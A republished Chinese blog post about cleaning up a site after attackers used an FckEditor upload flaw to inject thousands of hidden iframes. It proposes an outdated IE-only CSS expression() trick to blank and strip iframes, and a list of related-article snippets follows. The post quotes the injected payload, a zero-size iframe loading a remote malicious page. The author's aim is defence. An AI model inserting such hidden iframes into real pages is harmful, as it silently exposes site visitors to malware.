解决网站防挂IFRAME木马方案(治标不治本^_^)

news/2024/5/10 0:42:53/文章来源:https://blog.csdn.net/codeshark/article/details/2477609

  IFRAME木马解决方案

今天一上服务器2000多个<iframe src="http://ca.winvv.com/cn.htm" width=0 height=0></iframe> 注入,我晕!检查了半天,原来是FckEditor编辑器上传漏洞导致。在找资料的同时,发现CSS有一个有趣的属性expression,发现这个东东还有点意思,由此写出来,“以儆效尤”!
  引用:“IE5 及其以后版本支持在CSS中使用expression,用来把CSS属性和JavaScript脚本关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性。就是说CSS属性后面可以是一段JavaScript表达式,CSS属性的值等于Javascript表达式执行的结果。在表达式中可以直接 引用元素自身的属性和方法,也可以使用其他浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。”我的理解是:expression后面接js表达式执行相关操作
  格式:
(1)标记固有的CSS属性名:expression(JS表达式);
(2)自定义属性名:expression(JS表达式);

使用JS销毁iframe对象原理:使iframe里的请求地址变成空白页(about:blank),再将iframe对象从DOM(文档对象模型)中移除就可以切断所有iframe里的请求了。
CSS代码:iframe{WuWei:expression(this.src='about:blank',this.outerHTML='');}
解释:outerHTML属性是DOM对象包含自身的HTML代码,而 innerHTML则是DOM对象(不含本身)里面所包含的HTML代码。
例子如下: 如果要使自己的iframe显示在网页里,而别人挂的IFRAME马都不起作用,在CSS里加一个
#okiWuWei{iWuWei:expression() !important}
对应的IFRAME代码为:
<iframe id="okiWuWei"  src="http://blog.csdn.net/codeshark/"></iframe>
就OK了。
问题总结:很多垃圾站点都通过“弹窗”的方式来增加自己的点击率跟访问量,估计也是通过iframe注入木马,然后达到这种效果的。当然次方法只是IE ONLY.也不能从根本上防止木马的注入。

首先,新建一个网页,插入以上的CSS代码(或在您现有的CSS代码里加入上面那句):
< style type = " text/css " >
iframe
{WuWei:expression(this.src='about:blank',this.outerHTML='');}
</ style >
然后在这个页面插入几个IFRAME代码,假设它们是被挂的木马网页。代码如下:
< iframe src = "" ></ iframe >  
< iframe src = " http://blog.csdn.net/codeshark/ " ></ iframe > 无为博客

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_896025.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Java博客网站项目

这是一个关于Java语言的博客网站项目&#xff0c;基于Spring的一系列框架。 详细介绍&#xff1a; 1、软件架构说明 前端使用了 Bootstrap框架、Thymeleaf模板引擎、Ajax、JQuery、Html5、Css3、thinker-markdown文本编辑器、jquery的taginput标签插件、font-awesome这个图标插…

自学宝典:10个学习Android开发的网站推荐

1. Android Developers 作为一个Android开发者&#xff0c;官网的资料当然不可错过&#xff0c;从设计&#xff0c;培训&#xff0c;指南&#xff0c;文档&#xff0c;都不应该错过&#xff0c;在以后的学习过程中慢慢理解体会。 2. Android Guides - CodePath CodePath是国外一…

网站建设与深度学习(PHP调用Python程序)

一、深度学习应用 我采用的时Google开发的Tensorflow深度学习框架&#xff0c;基于Python编写的图片语义描述深度学习应用。 二、PHP调用 php中无法带调用python程序中的方法&#xff0c;但是可以用命令行执行python程序&#xff0c;但是不知道什么原因&#xff0c;php中有时…

教你搭一个简单的前后端交互小网站

最近想自己搭一个网站&#xff0c;但仅仅会前端还是有点做不到实际情况中的前后端交互&#xff0c;就自己瞎鼓捣了几个工具&#xff0c;来搭一个简单的网站。 工具&#xff1a; 后端处理这种自己做的小网站用 Node是最好不过来&#xff08;其他语言不会。。&#xff09;&#…

添加新的默认网页sorry.html,在默认主页不能访问的情况下显示“很抱歉...该网站正在维护中,请您在4月1号之后再访问,感谢您的支持。”

在默认发布目录下创建文件vim /var/www/html/sorry.html写入一个html基本页面 修改主配置文件 当我们删掉index.html的时候&#xff0c;重启服务后发现&#xff0c;默认发布文件已经改变

提升Chrome访问网站的速度

FasterChrome 基于 instant.page 项目&#xff0c;一个可以在一分钟内加速网站的小脚本。原理是这样的&#xff0c;当你使用鼠标移动到链接上&#xff0c;并且按下去&#xff0c;这个时间段平均在 300 毫秒&#xff0c;而 instant.page 会在你的鼠标悬停在链接上超过 65 毫秒就…

python-js逆向之某ip网站:js混淆,base64加密,无法断点调试

目标网站&#xff1a;https://www.baibianip.com/home/free.html 在家公众号看到&#xff0c;拿来练练手。 打开网页源代码发现每个id都变成了 <td> <script>FFcampanology(ZGH4AQt1AQNmZwR2AF4lZwHhZmLhAwxkAGxkAwVkAmt0); </script></td> 那坑定…

python-js逆向之某租网站-AES加密

目标网站&#xff1a;aHR0cHM6Ly93d3cubWFvbWFvenUuY29tLyMvYnVpbGQ 话不多说直接开干 1.打开网页&#xff0c;查看源码&#xff0c;哟吼&#xff0c;比我还干净&#xff0c;查找xhr&#xff0c;发现有三个文件&#xff0c;且都是加密数据 2.开始一般操作&#xff0c;随意复制…

在线免费词云图制作网站汇总

在线免费词云图制作网站汇总 1. Word Art2. EdWordle3. 微词云 写这个帖子主要是为了自己需要用到的时候能快速查找&#xff0c;所以整理了一下自己觉得好用的词云图制作工具。如果能帮助到更多人的话&#xff0c;也未尝不是一件好事。 1. Word Art 网址&#xff1a; https:/…

网站流量日志分析系统笔记(Hadoop大数据技术原理与应用)

一、系统架构设计 首先&#xff0c;会将Nginx服务器所产生的日志文件通过Flume采集到HDFS中&#xff1b;其次&#xff0c;开发人员根据原始日志文件及规定数据格式定制开发MapReduce程序进行数据与处理&#xff1b;接着&#xff0c;通过Hive进行最为重要的数据分析&#xff1b;…

python爬虫学习之路(1) 利用urllib爬取网站

网络爬虫的定义 网络爬虫&#xff0c;也叫网络蜘蛛(Web Spider)&#xff0c;如果把互联网比喻成一个蜘蛛网&#xff0c;Spider就是一只在网上爬来爬去的蜘蛛。网络爬虫就是根据网页的地址来寻找网页的&#xff0c;也就是URL。举一个简单的例子&#xff0c;我们在浏览器的地址栏…

ssm/php/java/net/python中小学生视频在线网站

本系统带文档lw1万字答辩PPT查重 如果这个题目不合适&#xff0c;可以去我上传的资源里面找题目&#xff0c;找不到的话&#xff0c;评论留下题目&#xff0c;或者站内私信我&#xff0c; 有时间看到机会给你发 系统设计 .1 系统体系结构 中小学生视频在线网站的结构图-1所示&…

java/php/net/python/springboot英语四级网站设计

本系统带文档lw1万字答辩PPT查重 如果这个题目不合适&#xff0c;可以去我上传的资源里面找题目&#xff0c;找不到的话&#xff0c;评论留下题目&#xff0c;或者站内私信我&#xff0c; 有时间看到机会给你发 系统UML用例分析 1管理员用例 管理员登录后可进行个人中心、用户管…

java/php/net/python个人书籍互享的网站(类似二手书)设计

本系统带文档lw1万字答辩PPT查重 如果这个题目不合适&#xff0c;可以去我上传的资源里面找题目&#xff0c;找不到的话&#xff0c;评论留下题目&#xff0c;或者站内私信我&#xff0c; 有时间看到机会给你发 1、关于个人书籍互享管理系统的基本要求 &#xff08;1&#xf…

java/php/net/python红木家居购物网站的设计

本系统带文档lw1万字答辩PPT查重 如果这个题目不合适&#xff0c;可以去我上传的资源里面找题目&#xff0c;找不到的话&#xff0c;评论留下题目&#xff0c;或者站内私信我&#xff0c; 有时间看到机会给你发 1管理员用例 管理员登录后可进行个人中心、用户管理、商品类别管…

java/php/net/python基于web的家具网站的设计

本系统带文档lw1万字答辩PPT查重 如果这个题目不合适&#xff0c;可以去我上传的资源里面找题目&#xff0c;找不到的话&#xff0c;评论留下题目&#xff0c;或者站内私信我&#xff0c; 有时间看到机会给你发 系统用例分析 1管理员用例图 系统中的核心用户是系统管理员&#…

java/php/net/python类百度文库网站的设计与实现

本系统带文档lw1万字答辩PPT查重 如果这个题目不合适&#xff0c;可以去我上传的资源里面找题目&#xff0c;找不到的话&#xff0c;评论留下题目&#xff0c;或者站内私信我&#xff0c; 有时间看到机会给你发 管理员用例图 系统中的核心用户是系统管理员&#xff0c;管理员…

java/php/net/python“反传销”宣传网站的设计与实现

本系统带文档lw1万字答辩PPT查重 如果这个题目不合适&#xff0c;可以去我上传的资源里面找题目&#xff0c;找不到的话&#xff0c;评论留下题目&#xff0c;或者站内私信我&#xff0c; 有时间看到机会给你发 1、关于“反传销”网站的设计与实现的基本要求 &#xff08;1&…

java/php/net/python零食销售网站系统的设计

本系统带文档lw1万字答辩PPT查重 如果这个题目不合适&#xff0c;可以去我上传的资源里面找题目&#xff0c;找不到的话&#xff0c;评论留下题目&#xff0c;或者站内私信我&#xff0c; 有时间看到机会给你发 1、关于零食销售网站系统的基本要求 &#xff08;1&#xff09…

java/php/net/python“最终幻想14”游戏时装图鉴网站设计与制作

本系统带文档lw1万字答辩PPT查重 如果这个题目不合适&#xff0c;可以去我上传的资源里面找题目&#xff0c;找不到的话&#xff0c;评论留下题目&#xff0c;或者站内私信我&#xff0c; 有时间看到机会给你发 1、关于“最终幻想14”游戏时装图鉴网站设计与制作的基本要求 &…